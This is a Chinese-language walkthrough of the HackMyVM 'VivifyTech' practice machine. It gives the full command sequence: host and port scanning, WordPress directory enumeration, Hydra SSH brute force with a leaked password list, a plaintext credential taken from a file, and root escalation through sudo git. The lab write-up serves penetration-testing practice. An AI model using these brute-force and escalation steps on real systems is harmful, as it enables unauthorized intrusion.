HackMyVM-VivifyTech靶机的测试报告

目录

一、测试环境

1、系统环境

2、使用工具/软件

二、测试目的

三、操作过程

1、信息搜集

2、Getshell

3、提权

四、结论


一、测试环境

1、系统环境

渗透机:kali2021.1(192.168.101.127)

靶  机:debian(192.168.101.109)

注意事项:

①该类型靶场只能在virtualBox上搭建,因此将靶机设置为桥接网络,方便进行渗透。攻击机kali也要桥接出来,不然会出问题。

②靶机启动失败:设置中取消勾选usb即可

2、使用工具/软件

Kali: arp-scan(主机探测)、nmap(端口和服务探测)、gobuster(目录扫描)、cmseek(探测cms信息)、hydra(爆破ssh登录)、ssh(远程连接)

测试网址:http://192.168.101.109

靶场介绍:由国外大佬搭建的靶场,类似于vulnhub,经常更新,需要翻墙才能进。

地址:https://hackmyvm.eu/machines/machine.php?vm=VivifyTech

二、测试目的

练习渗透思路,熟悉git提权命令。

三、操作过程

1、信息搜集

主机探测

arp-scan -l

靶机IP:192.168.101.109

物理机IP:192.168.101.241

端口和服务探测

nmap -sT -A -p- -T4 192.168.101.109

开放了22端口(ssh服务)、80端口(web服务)、3306服务(MySQL服务)、33060端口

目录扫描

gobuster dir -u http://192.168.101.109 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

可以看到存在wordpress服务

扫描wordpress目录

存在很多目录

gobuster dir -u http://192.168.101.109/wordpress -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,jsp,html,txt

收集wordpress信息

​cmseek -u http://192.168.101.109/wordpress

找到一个用户名:sancelisso

在wordpress目录主页

下方有个看、读、听的模块

在这个故事中,有几个人名,是后面需要用到的

Sarah、Mark、Emily、Jake

在wordpress的wp-includes目录中泄露了很多源码

并且有secret密码文档

2、Getshell

将密码文档下载,尝试爆破sancelisso用户的密码

wpscan --url http://192.168.101.109/wordpress/ -U sancelisso -P secrets.txt

爆破失败了,看来这不是wordpress的密码

记得那四个人名吗?

尝试使用它作为用户名,爆破ssh登录,密码就使用secrets.txt

需要注意的是:用户名要小写才能爆破成功

vim user.txt
cat user.txt
hydra -L user.txt -P secrets.txt ssh://192.168.101.109 -I -f

尝试ssh登录靶机,爆破成功

ssh sarah@192.168.101.109

可以在家目录看到user.txt : HMV{Y0u_G07_Th15_0ne_6543}

ls -la
cat user.txt

3、提权

可以在Sarah的家目录发现两个隐藏目录

在.private目录中有一个Tasks.txt文件,提到了一个用户gbodja并且给出了密码,而且说这个用户有任务上的信任

cd .private/
cat Tasks.txt

gbodja:4Tch055ouy370N

切换到gbodja用户,成功切换

su gbodja

查看sudo权限发现,果然这个用户有特权,该用户可以sudo执行git命令

sudo -l

查看git命令提权的文档:git | GTFOBins icon-default.png?t=O83Ahttps://gtfobins.github.io/gtfobins/git/

只需要进入交互式界面,输入!sh即可提权

sudo git -p -h config

!sh
cd
cat root.txt

可以看到root.txt:HMV{Y4NV!7Ch3N1N_Y0u_4r3_7h3_R007_8672}

四、结论

知道了git工具sudo提权的方法,熟悉了渗透思路。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ccc_9wy

觉得写的好的话就赏杯奶茶喝吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值